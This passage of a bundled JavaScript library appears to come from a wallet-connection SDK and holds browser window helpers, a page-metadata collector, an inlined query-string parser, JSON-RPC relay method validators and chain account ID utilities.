$9cba2bd26fe13e26$exports.getLocalStorage = $9cba2bd26fe13e26$exports.getLocalStorageOrThrow = $9cba2bd26fe13e26$exports.getCrypto = $9cba2bd26fe13e26$exports.getCryptoOrThrow = $9cba2bd26fe13e26$exports.getLocation = $9cba2bd26fe13e26$exports.getLocationOrThrow = $9cba2bd26fe13e26$exports.getNavigator = $9cba2bd26fe13e26$exports.getNavigatorOrThrow = $9cba2bd26fe13e26$exports.getDocument = $9cba2bd26fe13e26$exports.getDocumentOrThrow = $9cba2bd26fe13e26$exports.getFromWindowOrThrow = $9cba2bd26fe13e26$exports.getFromWindow = void 0;
function $9cba2bd26fe13e26$var$getFromWindow(name) {
    let res = undefined;
    if (typeof window !== "undefined" && typeof window[name] !== "undefined") res = window[name];
    return res;
}
$9cba2bd26fe13e26$exports.getFromWindow = $9cba2bd26fe13e26$var$getFromWindow;
function $9cba2bd26fe13e26$var$getFromWindowOrThrow(name) {
    const res = $9cba2bd26fe13e26$var$getFromWindow(name);
    if (!res) throw new Error(`${name} is not defined in Window`);
    return res;
}
$9cba2bd26fe13e26$exports.getFromWindowOrThrow = $9cba2bd26fe13e26$var$getFromWindowOrThrow;
function $9cba2bd26fe13e26$var$getDocumentOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("document");
}
$9cba2bd26fe13e26$exports.getDocumentOrThrow = $9cba2bd26fe13e26$var$getDocumentOrThrow;
function $9cba2bd26fe13e26$var$getDocument() {
    return $9cba2bd26fe13e26$var$getFromWindow("document");
}
$9cba2bd26fe13e26$exports.getDocument = $9cba2bd26fe13e26$var$getDocument;
function $9cba2bd26fe13e26$var$getNavigatorOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("navigator");
}
$9cba2bd26fe13e26$exports.getNavigatorOrThrow = $9cba2bd26fe13e26$var$getNavigatorOrThrow;
function $9cba2bd26fe13e26$var$getNavigator() {
    return $9cba2bd26fe13e26$var$getFromWindow("navigator");
}
$9cba2bd26fe13e26$exports.getNavigator = $9cba2bd26fe13e26$var$getNavigator;
function $9cba2bd26fe13e26$var$getLocationOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("location");
}
$9cba2bd26fe13e26$exports.getLocationOrThrow = $9cba2bd26fe13e26$var$getLocationOrThrow;
function $9cba2bd26fe13e26$var$getLocation() {
    return $9cba2bd26fe13e26$var$getFromWindow("location");
}
$9cba2bd26fe13e26$exports.getLocation = $9cba2bd26fe13e26$var$getLocation;
function $9cba2bd26fe13e26$var$getCryptoOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("crypto");
}
$9cba2bd26fe13e26$exports.getCryptoOrThrow = $9cba2bd26fe13e26$var$getCryptoOrThrow;
function $9cba2bd26fe13e26$var$getCrypto() {
    return $9cba2bd26fe13e26$var$getFromWindow("crypto");
}
$9cba2bd26fe13e26$exports.getCrypto = $9cba2bd26fe13e26$var$getCrypto;
function $9cba2bd26fe13e26$var$getLocalStorageOrThrow() {
    return $9cba2bd26fe13e26$var$getFromWindowOrThrow("localStorage");
}
$9cba2bd26fe13e26$exports.getLocalStorageOrThrow = $9cba2bd26fe13e26$var$getLocalStorageOrThrow;
function $9cba2bd26fe13e26$var$getLocalStorage() {
    return $9cba2bd26fe13e26$var$getFromWindow("localStorage");
}
$9cba2bd26fe13e26$exports.getLocalStorage = $9cba2bd26fe13e26$var$getLocalStorage;


var $6824eb17eeee766a$exports = {};
"use strict";
Object.defineProperty($6824eb17eeee766a$exports, "__esModule", {
    value: true
});
$6824eb17eeee766a$exports.getWindowMetadata = void 0;

function $6824eb17eeee766a$var$getWindowMetadata() {
    let doc;
    let loc;
    try {
        doc = $9cba2bd26fe13e26$exports.getDocumentOrThrow();
        loc = $9cba2bd26fe13e26$exports.getLocationOrThrow();
    } catch (e) {
        return null;
    }
    function getIcons() {
        const links = doc.getElementsByTagName("link");
        const icons = [];
        for(let i = 0; i < links.length; i++){
            const link = links[i];
            const rel = link.getAttribute("rel");
            if (rel) {
                if (rel.toLowerCase().indexOf("icon") > -1) {
                    const href = link.getAttribute("href");
                    if (href) {
                        if (href.toLowerCase().indexOf("https:") === -1 && href.toLowerCase().indexOf("http:") === -1 && href.indexOf("//") !== 0) {
                            let absoluteHref = loc.protocol + "//" + loc.host;
                            if (href.indexOf("/") === 0) absoluteHref += href;
                            else {
                                const path = loc.pathname.split("/");
                                path.pop();
                                const finalPath = path.join("/");
                                absoluteHref += finalPath + "/" + href;
                            }
                            icons.push(absoluteHref);
                        } else if (href.indexOf("//") === 0) {
                            const absoluteUrl = loc.protocol + href;
                            icons.push(absoluteUrl);
                        } else icons.push(href);
                    }
                }
            }
        }
        return icons;
    }
    function getWindowMetadataOfAny(...args) {
        const metaTags = doc.getElementsByTagName("meta");
        for(let i = 0; i < metaTags.length; i++){
            const tag = metaTags[i];
            const attributes = [
                "itemprop",
                "property",
                "name"
            ].map((target)=>tag.getAttribute(target)).filter((attr)=>{
                if (attr) return args.includes(attr);
                return false;
            });
            if (attributes.length && attributes) {
                const content = tag.getAttribute("content");
                if (content) return content;
            }
        }
        return "";
    }
    function getName() {
        let name = getWindowMetadataOfAny("name", "og:site_name", "og:title", "twitter:title");
        if (!name) name = doc.title;
        return name;
    }
    function getDescription() {
        const description = getWindowMetadataOfAny("description", "og:description", "twitter:description", "keywords");
        return description;
    }
    const name = getName();
    const description = getDescription();
    const url = loc.origin;
    const icons = getIcons();
    const meta = {
        description: description,
        url: url,
        icons: icons,
        name: name
    };
    return meta;
}
$6824eb17eeee766a$exports.getWindowMetadata = $6824eb17eeee766a$var$getWindowMetadata;


var $3ecb7368762fc268$export$f9380c9a627682d3;
var $3ecb7368762fc268$export$98e6a39c04603d36;
var $3ecb7368762fc268$export$fac44ee5b035f737;
var $3ecb7368762fc268$export$7a5253c0f62e0150;
var $3ecb7368762fc268$export$a8c1621ea79325d3;
var $3ecb7368762fc268$export$357523c63a2253b9;
var $3ecb7368762fc268$export$44c361b8ec72ef7f;
"use strict";
var $2854ab6fe5249e91$exports = {};
"use strict";
$2854ab6fe5249e91$exports = (str)=>encodeURIComponent(str).replace(/[!'()*]/g, (x)=>`%${x.charCodeAt(0).toString(16).toUpperCase()}`);


var $40bbc24beab9f9b8$exports = {};
"use strict";
var $40bbc24beab9f9b8$var$token = "%[a-f0-9]{2}";
var $40bbc24beab9f9b8$var$singleMatcher = new RegExp("(" + $40bbc24beab9f9b8$var$token + ")|([^%]+?)", "gi");
var $40bbc24beab9f9b8$var$multiMatcher = new RegExp("(" + $40bbc24beab9f9b8$var$token + ")+", "gi");
function $40bbc24beab9f9b8$var$decodeComponents(components, split) {
    try {
        // Try to decode the entire string first
        return [
            decodeURIComponent(components.join(""))
        ];
    } catch (err) {
    // Do nothing
    }
    if (components.length === 1) return components;
    split = split || 1;
    // Split the array in 2 parts
    var left = components.slice(0, split);
    var right = components.slice(split);
    return Array.prototype.concat.call([], $40bbc24beab9f9b8$var$decodeComponents(left), $40bbc24beab9f9b8$var$decodeComponents(right));
}
function $40bbc24beab9f9b8$var$decode(input) {
    try {
        return decodeURIComponent(input);
    } catch (err) {
        var tokens = input.match($40bbc24beab9f9b8$var$singleMatcher) || [];
        for(var i = 1; i < tokens.length; i++){
            input = $40bbc24beab9f9b8$var$decodeComponents(tokens, i).join("");
            tokens = input.match($40bbc24beab9f9b8$var$singleMatcher) || [];
        }
        return input;
    }
}
function $40bbc24beab9f9b8$var$customDecodeURIComponent(input) {
    // Keep track of all the replacements and prefill the map with the `BOM`
    var replaceMap = {
        "%FE%FF": "��",
        "%FF%FE": "��"
    };
    var match = $40bbc24beab9f9b8$var$multiMatcher.exec(input);
    while(match){
        try {
            // Decode as big chunks as possible
            replaceMap[match[0]] = decodeURIComponent(match[0]);
        } catch (err) {
            var result = $40bbc24beab9f9b8$var$decode(match[0]);
            if (result !== match[0]) replaceMap[match[0]] = result;
        }
        match = $40bbc24beab9f9b8$var$multiMatcher.exec(input);
    }
    // Add `%C2` at the end of the map to make sure it does not replace the combinator before everything else
    replaceMap["%C2"] = "�";
    var entries = Object.keys(replaceMap);
    for(var i = 0; i < entries.length; i++){
        // Replace all decoded components
        var key = entries[i];
        input = input.replace(new RegExp(key, "g"), replaceMap[key]);
    }
    return input;
}
$40bbc24beab9f9b8$exports = function(encodedURI) {
    if (typeof encodedURI !== "string") throw new TypeError("Expected `encodedURI` to be of type `string`, got `" + typeof encodedURI + "`");
    try {
        encodedURI = encodedURI.replace(/\+/g, " ");
        // Try the built in decoder first
        return decodeURIComponent(encodedURI);
    } catch (err) {
        // Fallback to a more advanced decoder
        return $40bbc24beab9f9b8$var$customDecodeURIComponent(encodedURI);
    }
};


var $08bd16383ca1ef3d$exports = {};
"use strict";
$08bd16383ca1ef3d$exports = (string, separator)=>{
    if (!(typeof string === "string" && typeof separator === "string")) throw new TypeError("Expected the arguments to be of type `string`");
    if (separator === "") return [
        string
    ];
    const separatorIndex = string.indexOf(separator);
    if (separatorIndex === -1) return [
        string
    ];
    return [
        string.slice(0, separatorIndex),
        string.slice(separatorIndex + separator.length)
    ];
};


var $36fe9d1ef26e3f64$exports = {};
"use strict";
$36fe9d1ef26e3f64$exports = function(obj, predicate) {
    var ret = {};
    var keys = Object.keys(obj);
    var isArr = Array.isArray(predicate);
    for(var i = 0; i < keys.length; i++){
        var key = keys[i];
        var val = obj[key];
        if (isArr ? predicate.indexOf(key) !== -1 : predicate(key, val, obj)) ret[key] = val;
    }
    return ret;
};


const $3ecb7368762fc268$var$isNullOrUndefined = (value)=>value === null || value === undefined;
const $3ecb7368762fc268$var$encodeFragmentIdentifier = Symbol("encodeFragmentIdentifier");
function $3ecb7368762fc268$var$encoderForArrayFormat(options) {
    switch(options.arrayFormat){
        case "index":
            return (key)=>(result, value)=>{
                    const index = result.length;
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[",
                            index,
                            "]"
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[",
                            $3ecb7368762fc268$var$encode(index, options),
                            "]=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "bracket":
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[]"
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "[]=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "colon-list-separator":
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            ":list="
                        ].join("")
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            ":list=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
        case "comma":
        case "separator":
        case "bracket-separator":
            {
                const keyValueSep = options.arrayFormat === "bracket-separator" ? "[]=" : "=";
                return (key)=>(result, value)=>{
                        if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                        // Translate null to an empty string so that it doesn't serialize as 'null'
                        value = value === null ? "" : value;
                        if (result.length === 0) return [
                            [
                                $3ecb7368762fc268$var$encode(key, options),
                                keyValueSep,
                                $3ecb7368762fc268$var$encode(value, options)
                            ].join("")
                        ];
                        return [
                            [
                                result,
                                $3ecb7368762fc268$var$encode(value, options)
                            ].join(options.arrayFormatSeparator)
                        ];
                    };
            }
        default:
            return (key)=>(result, value)=>{
                    if (value === undefined || options.skipNull && value === null || options.skipEmptyString && value === "") return result;
                    if (value === null) return [
                        ...result,
                        $3ecb7368762fc268$var$encode(key, options)
                    ];
                    return [
                        ...result,
                        [
                            $3ecb7368762fc268$var$encode(key, options),
                            "=",
                            $3ecb7368762fc268$var$encode(value, options)
                        ].join("")
                    ];
                };
    }
}
function $3ecb7368762fc268$var$parserForArrayFormat(options) {
    let result;
    switch(options.arrayFormat){
        case "index":
            return (key, value, accumulator)=>{
                result = /\[(\d*)\]$/.exec(key);
                key = key.replace(/\[\d*\]$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) accumulator[key] = {};
                accumulator[key][result[1]] = value;
            };
        case "bracket":
            return (key, value, accumulator)=>{
                result = /(\[\])$/.exec(key);
                key = key.replace(/\[\]$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) {
                    accumulator[key] = [
                        value
                    ];
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
        case "colon-list-separator":
            return (key, value, accumulator)=>{
                result = /(:list)$/.exec(key);
                key = key.replace(/:list$/, "");
                if (!result) {
                    accumulator[key] = value;
                    return;
                }
                if (accumulator[key] === undefined) {
                    accumulator[key] = [
                        value
                    ];
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
        case "comma":
        case "separator":
            return (key, value, accumulator)=>{
                const isArray = typeof value === "string" && value.includes(options.arrayFormatSeparator);
                const isEncodedArray = typeof value === "string" && !isArray && $3ecb7368762fc268$var$decode(value, options).includes(options.arrayFormatSeparator);
                value = isEncodedArray ? $3ecb7368762fc268$var$decode(value, options) : value;
                const newValue = isArray || isEncodedArray ? value.split(options.arrayFormatSeparator).map((item)=>$3ecb7368762fc268$var$decode(item, options)) : value === null ? value : $3ecb7368762fc268$var$decode(value, options);
                accumulator[key] = newValue;
            };
        case "bracket-separator":
            return (key, value, accumulator)=>{
                const isArray = /(\[\])$/.test(key);
                key = key.replace(/\[\]$/, "");
                if (!isArray) {
                    accumulator[key] = value ? $3ecb7368762fc268$var$decode(value, options) : value;
                    return;
                }
                const arrayValue = value === null ? [] : value.split(options.arrayFormatSeparator).map((item)=>$3ecb7368762fc268$var$decode(item, options));
                if (accumulator[key] === undefined) {
                    accumulator[key] = arrayValue;
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], arrayValue);
            };
        default:
            return (key, value, accumulator)=>{
                if (accumulator[key] === undefined) {
                    accumulator[key] = value;
                    return;
                }
                accumulator[key] = [].concat(accumulator[key], value);
            };
    }
}
function $3ecb7368762fc268$var$validateArrayFormatSeparator(value) {
    if (typeof value !== "string" || value.length !== 1) throw new TypeError("arrayFormatSeparator must be single character string");
}
function $3ecb7368762fc268$var$encode(value, options) {
    if (options.encode) return options.strict ? $2854ab6fe5249e91$exports(value) : encodeURIComponent(value);
    return value;
}
function $3ecb7368762fc268$var$decode(value, options) {
    if (options.decode) return $40bbc24beab9f9b8$exports(value);
    return value;
}
function $3ecb7368762fc268$var$keysSorter(input) {
    if (Array.isArray(input)) return input.sort();
    if (typeof input === "object") return $3ecb7368762fc268$var$keysSorter(Object.keys(input)).sort((a, b)=>Number(a) - Number(b)).map((key)=>input[key]);
    return input;
}
function $3ecb7368762fc268$var$removeHash(input) {
    const hashStart = input.indexOf("#");
    if (hashStart !== -1) input = input.slice(0, hashStart);
    return input;
}
function $3ecb7368762fc268$var$getHash(url) {
    let hash = "";
    const hashStart = url.indexOf("#");
    if (hashStart !== -1) hash = url.slice(hashStart);
    return hash;
}
function $3ecb7368762fc268$var$extract(input) {
    input = $3ecb7368762fc268$var$removeHash(input);
    const queryStart = input.indexOf("?");
    if (queryStart === -1) return "";
    return input.slice(queryStart + 1);
}
function $3ecb7368762fc268$var$parseValue(value, options) {
    if (options.parseNumbers && !Number.isNaN(Number(value)) && typeof value === "string" && value.trim() !== "") value = Number(value);
    else if (options.parseBooleans && value !== null && (value.toLowerCase() === "true" || value.toLowerCase() === "false")) value = value.toLowerCase() === "true";
    return value;
}
function $3ecb7368762fc268$var$parse(query, options) {
    options = Object.assign({
        decode: true,
        sort: true,
        arrayFormat: "none",
        arrayFormatSeparator: ",",
        parseNumbers: false,
        parseBooleans: false
    }, options);
    $3ecb7368762fc268$var$validateArrayFormatSeparator(options.arrayFormatSeparator);
    const formatter = $3ecb7368762fc268$var$parserForArrayFormat(options);
    // Create an object with no prototype
    const ret = Object.create(null);
    if (typeof query !== "string") return ret;
    query = query.trim().replace(/^[?#&]/, "");
    if (!query) return ret;
    for (const param of query.split("&")){
        if (param === "") continue;
        let [key, value] = $08bd16383ca1ef3d$exports(options.decode ? param.replace(/\+/g, " ") : param, "=");
        // Missing `=` should be `null`:
        // http://w3.org/TR/2012/WD-url-20120524/#collect-url-parameters
        value = value === undefined ? null : [
            "comma",
            "separator",
            "bracket-separator"
        ].includes(options.arrayFormat) ? value : $3ecb7368762fc268$var$decode(value, options);
        formatter($3ecb7368762fc268$var$decode(key, options), value, ret);
    }
    for (const key of Object.keys(ret)){
        const value = ret[key];
        if (typeof value === "object" && value !== null) for (const k of Object.keys(value))value[k] = $3ecb7368762fc268$var$parseValue(value[k], options);
        else ret[key] = $3ecb7368762fc268$var$parseValue(value, options);
    }
    if (options.sort === false) return ret;
    return (options.sort === true ? Object.keys(ret).sort() : Object.keys(ret).sort(options.sort)).reduce((result, key)=>{
        const value = ret[key];
        if (Boolean(value) && typeof value === "object" && !Array.isArray(value)) // Sort object keys, not values
        result[key] = $3ecb7368762fc268$var$keysSorter(value);
        else result[key] = value;
        return result;
    }, Object.create(null));
}
$3ecb7368762fc268$export$f9380c9a627682d3 = $3ecb7368762fc268$var$extract;
$3ecb7368762fc268$export$98e6a39c04603d36 = $3ecb7368762fc268$var$parse;
$3ecb7368762fc268$export$fac44ee5b035f737 = (object, options)=>{
    if (!object) return "";
    options = Object.assign({
        encode: true,
        strict: true,
        arrayFormat: "none",
        arrayFormatSeparator: ","
    }, options);
    $3ecb7368762fc268$var$validateArrayFormatSeparator(options.arrayFormatSeparator);
    const shouldFilter = (key)=>options.skipNull && $3ecb7368762fc268$var$isNullOrUndefined(object[key]) || options.skipEmptyString && object[key] === "";
    const formatter = $3ecb7368762fc268$var$encoderForArrayFormat(options);
    const objectCopy = {};
    for (const key of Object.keys(object))if (!shouldFilter(key)) objectCopy[key] = object[key];
    const keys = Object.keys(objectCopy);
    if (options.sort !== false) keys.sort(options.sort);
    return keys.map((key)=>{
        const value = object[key];
        if (value === undefined) return "";
        if (value === null) return $3ecb7368762fc268$var$encode(key, options);
        if (Array.isArray(value)) {
            if (value.length === 0 && options.arrayFormat === "bracket-separator") return $3ecb7368762fc268$var$encode(key, options) + "[]";
            return value.reduce(formatter(key), []).join("&");
        }
        return $3ecb7368762fc268$var$encode(key, options) + "=" + $3ecb7368762fc268$var$encode(value, options);
    }).filter((x)=>x.length > 0).join("&");
};
$3ecb7368762fc268$export$7a5253c0f62e0150 = (url, options)=>{
    options = Object.assign({
        decode: true
    }, options);
    const [url_, hash] = $08bd16383ca1ef3d$exports(url, "#");
    return Object.assign({
        url: url_.split("?")[0] || "",
        query: $3ecb7368762fc268$var$parse($3ecb7368762fc268$var$extract(url), options)
    }, options && options.parseFragmentIdentifier && hash ? {
        fragmentIdentifier: $3ecb7368762fc268$var$decode(hash, options)
    } : {});
};
$3ecb7368762fc268$export$a8c1621ea79325d3 = (object, options)=>{
    options = Object.assign({
        encode: true,
        strict: true,
        [$3ecb7368762fc268$var$encodeFragmentIdentifier]: true
    }, options);
    const url = $3ecb7368762fc268$var$removeHash(object.url).split("?")[0] || "";
    const queryFromUrl = $3ecb7368762fc268$export$f9380c9a627682d3(object.url);
    const parsedQueryFromUrl = $3ecb7368762fc268$export$98e6a39c04603d36(queryFromUrl, {
        sort: false
    });
    const query = Object.assign(parsedQueryFromUrl, object.query);
    let queryString = $3ecb7368762fc268$export$fac44ee5b035f737(query, options);
    if (queryString) queryString = `?${queryString}`;
    let hash = $3ecb7368762fc268$var$getHash(object.url);
    if (object.fragmentIdentifier) hash = `#${options[$3ecb7368762fc268$var$encodeFragmentIdentifier] ? $3ecb7368762fc268$var$encode(object.fragmentIdentifier, options) : object.fragmentIdentifier}`;
    return `${url}${queryString}${hash}`;
};
$3ecb7368762fc268$export$357523c63a2253b9 = (input, filter, options)=>{
    options = Object.assign({
        parseFragmentIdentifier: true,
        [$3ecb7368762fc268$var$encodeFragmentIdentifier]: false
    }, options);
    const { url: url, query: query, fragmentIdentifier: fragmentIdentifier } = $3ecb7368762fc268$export$7a5253c0f62e0150(input, options);
    return $3ecb7368762fc268$export$a8c1621ea79325d3({
        url: url,
        query: $36fe9d1ef26e3f64$exports(query, filter),
        fragmentIdentifier: fragmentIdentifier
    }, options);
};
$3ecb7368762fc268$export$44c361b8ec72ef7f = (input, filter, options)=>{
    const exclusionFilter = Array.isArray(filter) ? (key)=>!filter.includes(key) : (key, value)=>!filter(key, value);
    return $3ecb7368762fc268$export$357523c63a2253b9(input, exclusionFilter, options);
};


var $6c5e0cebe7c6e693$exports = {};
$parcel$export($6c5e0cebe7c6e693$exports, "RELAY_JSONRPC", () => $a66838b5a814eb12$export$af490b3b9a6de00f);
var $7dcde13c6df73f83$exports = {};


function $770bbe0a33a0b266$export$804de46662e4ac95(obj, key, type = "string") {
    if (!obj[key] || typeof obj[key] !== type) throw new Error(`Missing or invalid "${key}" param`);
}
function $770bbe0a33a0b266$export$c538c02216fcdc03(params, required) {
    let matches = true;
    required.forEach((key)=>{
        const exists = key in params;
        if (!exists) matches = false;
    });
    return matches;
}
function $770bbe0a33a0b266$export$e4b3f942a6d00ef9(params, length) {
    return Array.isArray(params) ? params.length === length : Object.keys(params).length === length;
}
function $770bbe0a33a0b266$export$8fcd263f2845753e(params, minLength) {
    return Array.isArray(params) ? params.length >= minLength : Object.keys(params).length >= minLength;
}
function $770bbe0a33a0b266$export$19e8e281e27dafad(params, required, optional) {
    const exact = !optional.length;
    const matchesLength = exact ? $770bbe0a33a0b266$export$e4b3f942a6d00ef9(params, required.length) : $770bbe0a33a0b266$export$8fcd263f2845753e(params, required.length);
    if (!matchesLength) return false;
    return $770bbe0a33a0b266$export$c538c02216fcdc03(params, required);
}
function $770bbe0a33a0b266$export$18337b4ba58d5c33(method, expected, separator = "_") {
    const split = method.split(separator);
    return split[split.length - 1].trim().toLowerCase() === expected.trim().toLowerCase();
}



function $d7228e581edf756b$export$c75580565fa025bd(request) {
    return $d7228e581edf756b$export$f576347163de0984(request.method) && $d7228e581edf756b$export$dae2311546d43680(request.params);
}
function $d7228e581edf756b$export$f576347163de0984(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "subscribe");
}
function $d7228e581edf756b$export$dae2311546d43680(params) {
    const required = [
        "topic"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$8fa7cf76b41caee0(request) {
    return $d7228e581edf756b$export$71d4d33ac7f7a269(request.method) && $d7228e581edf756b$export$71e8d1aa48c3e86f(request.params);
}
function $d7228e581edf756b$export$71d4d33ac7f7a269(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "publish");
}
function $d7228e581edf756b$export$71e8d1aa48c3e86f(params) {
    const required = [
        "message",
        "topic",
        "ttl"
    ];
    const optional = [
        "prompt",
        "tag"
    ];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$83e292763180b41b(request) {
    return $d7228e581edf756b$export$568d956f39536025(request.method) && $d7228e581edf756b$export$cbc597c53c3b4f80(request.params);
}
function $d7228e581edf756b$export$568d956f39536025(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "unsubscribe");
}
function $d7228e581edf756b$export$cbc597c53c3b4f80(params) {
    const required = [
        "id",
        "topic"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}
function $d7228e581edf756b$export$43cf4100d6287b8e(request) {
    return $d7228e581edf756b$export$3cb4ad320e3a46a4(request.method) && $d7228e581edf756b$export$6366ff9a39f2da4c(request.params);
}
function $d7228e581edf756b$export$3cb4ad320e3a46a4(method) {
    return (0, $770bbe0a33a0b266$export$18337b4ba58d5c33)(method, "subscription");
}
function $d7228e581edf756b$export$6366ff9a39f2da4c(params) {
    const required = [
        "id",
        "data"
    ];
    const optional = [];
    return (0, $770bbe0a33a0b266$export$19e8e281e27dafad)(params, required, optional);
}


function $a40d50f3c8928009$export$abdf96c288cb375(request) {
    if (!(0, $d7228e581edf756b$export$f576347163de0984)(request.method)) throw new Error("JSON-RPC Request has invalid subscribe method");
    if (!(0, $d7228e581edf756b$export$dae2311546d43680)(request.params)) throw new Error("JSON-RPC Request has invalid subscribe params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "topic");
    return params;
}
function $a40d50f3c8928009$export$eac3e45ac5c5c9fa(request) {
    if (!(0, $d7228e581edf756b$export$71d4d33ac7f7a269)(request.method)) throw new Error("JSON-RPC Request has invalid publish method");
    if (!(0, $d7228e581edf756b$export$71e8d1aa48c3e86f)(request.params)) throw new Error("JSON-RPC Request has invalid publish params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "topic");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "message");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "ttl", "number");
    return params;
}
function $a40d50f3c8928009$export$78baa72f78156594(request) {
    if (!(0, $d7228e581edf756b$export$568d956f39536025)(request.method)) throw new Error("JSON-RPC Request has invalid unsubscribe method");
    if (!(0, $d7228e581edf756b$export$cbc597c53c3b4f80)(request.params)) throw new Error("JSON-RPC Request has invalid unsubscribe params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "id");
    return params;
}
function $a40d50f3c8928009$export$4d5822edd41f3b48(request) {
    if (!(0, $d7228e581edf756b$export$3cb4ad320e3a46a4)(request.method)) throw new Error("JSON-RPC Request has invalid subscription method");
    if (!(0, $d7228e581edf756b$export$6366ff9a39f2da4c)(request.params)) throw new Error("JSON-RPC Request has invalid subscription params");
    const params = request.params;
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "id");
    (0, $770bbe0a33a0b266$export$804de46662e4ac95)(params, "data");
    return params;
}


const $a66838b5a814eb12$export$af490b3b9a6de00f = {
    waku: {
        publish: "waku_publish",
        batchPublish: "waku_batchPublish",
        subscribe: "waku_subscribe",
        batchSubscribe: "waku_batchSubscribe",
        subscription: "waku_subscription",
        unsubscribe: "waku_unsubscribe",
        batchUnsubscribe: "waku_batchUnsubscribe"
    },
    irn: {
        publish: "irn_publish",
        batchPublish: "irn_batchPublish",
        subscribe: "irn_subscribe",
        batchSubscribe: "irn_batchSubscribe",
        subscription: "irn_subscription",
        unsubscribe: "irn_unsubscribe",
        batchUnsubscribe: "irn_batchUnsubscribe"
    },
    iridium: {
        publish: "iridium_publish",
        batchPublish: "iridium_batchPublish",
        subscribe: "iridium_subscribe",
        batchSubscribe: "iridium_batchSubscribe",
        subscription: "iridium_subscription",
        unsubscribe: "iridium_unsubscribe",
        batchUnsubscribe: "iridium_batchUnsubscribe"
    }
};



$parcel$exportWildcard($6c5e0cebe7c6e693$exports, $7dcde13c6df73f83$exports);



var $hPtJY = parcelRequire("hPtJY");
const $a5d33cfc7f8e5437$var$k = ":";
function $a5d33cfc7f8e5437$export$4764229d78de4437(e) {
    const [n, t] = e.split($a5d33cfc7f8e5437$var$k);
    return {
        namespace: n,
        reference: t
    };
}
function $a5d33cfc7f8e5437$export$a5999672e4930644(e) {
    const { namespace: n, reference: t } = e;
    return [
        n,
        t
    ].join($a5d33cfc7f8e5437$var$k);
}
function $a5d33cfc7f8e5437$export$276ab0158c66e3d(e) {
    const [n, t, r] = e.split($a5d33cfc7f8e5437$var$k);
    return {
        namespace: n,
        reference: t,
        address: r
    };
}
function $a5d33cfc7f8e5437$export$566a25328fb93a18(e) {
    const { namespace: n, reference: t, address: r } = e;
    return [
        n,
        t,
        r
    ].join($a5d33cfc7f8e5437$var$k);
}
function $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, n) {
    const t = [];
    return e.forEach((r)=>{
        const o = n(r);
        t.includes(o) || t.push(o);
    }), t;
}
function $a5d33cfc7f8e5437$export$2806d446053abd1d(e) {
    const { address: n } = $a5d33cfc7f8e5437$export$276ab0158c66e3d(e);
    return n;
}
function $a5d33cfc7f8e5437$export$93512919ec2ab555(e) {
    const { namespace: n, reference: t } = $a5d33cfc7f8e5437$export$276ab0158c66e3d(e);
    return $a5d33cfc7f8e5437$export$a5999672e4930644({
        namespace: n,
        reference: t
    });
}
function $a5d33cfc7f8e5437$export$40283ddc77f27f6e(e, n) {
    const { namespace: t, reference: r } = $a5d33cfc7f8e5437$export$4764229d78de4437(n);
    return $a5d33cfc7f8e5437$export$566a25328fb93a18({
        namespace: t,
        reference: r,
        address: e
    });
}
function $a5d33cfc7f8e5437$export$aa4a6b630dfcfa83(e) {
    return $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, $a5d33cfc7f8e5437$export$2806d446053abd1d);
}
function $a5d33cfc7f8e5437$export$d5ee58c6b13696e9(e) {
    return $a5d33cfc7f8e5437$export$d579bc26e95946b5(e, $a5d33cfc7f8e5437$export$93512919ec2ab555);
}
function $a5d33cfc7f8e5437$export$23329703ad972840(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
        if (n.length && !n.includes(r)) return;
        const o = e[r];
        t.push(...o.accounts);
    }), t;
}
function $a5d33cfc7f8e5437$export$6281ff29da5f85fe(e, n = []) {
    const t = [];
    return Object.keys(e).forEach((r)=>{
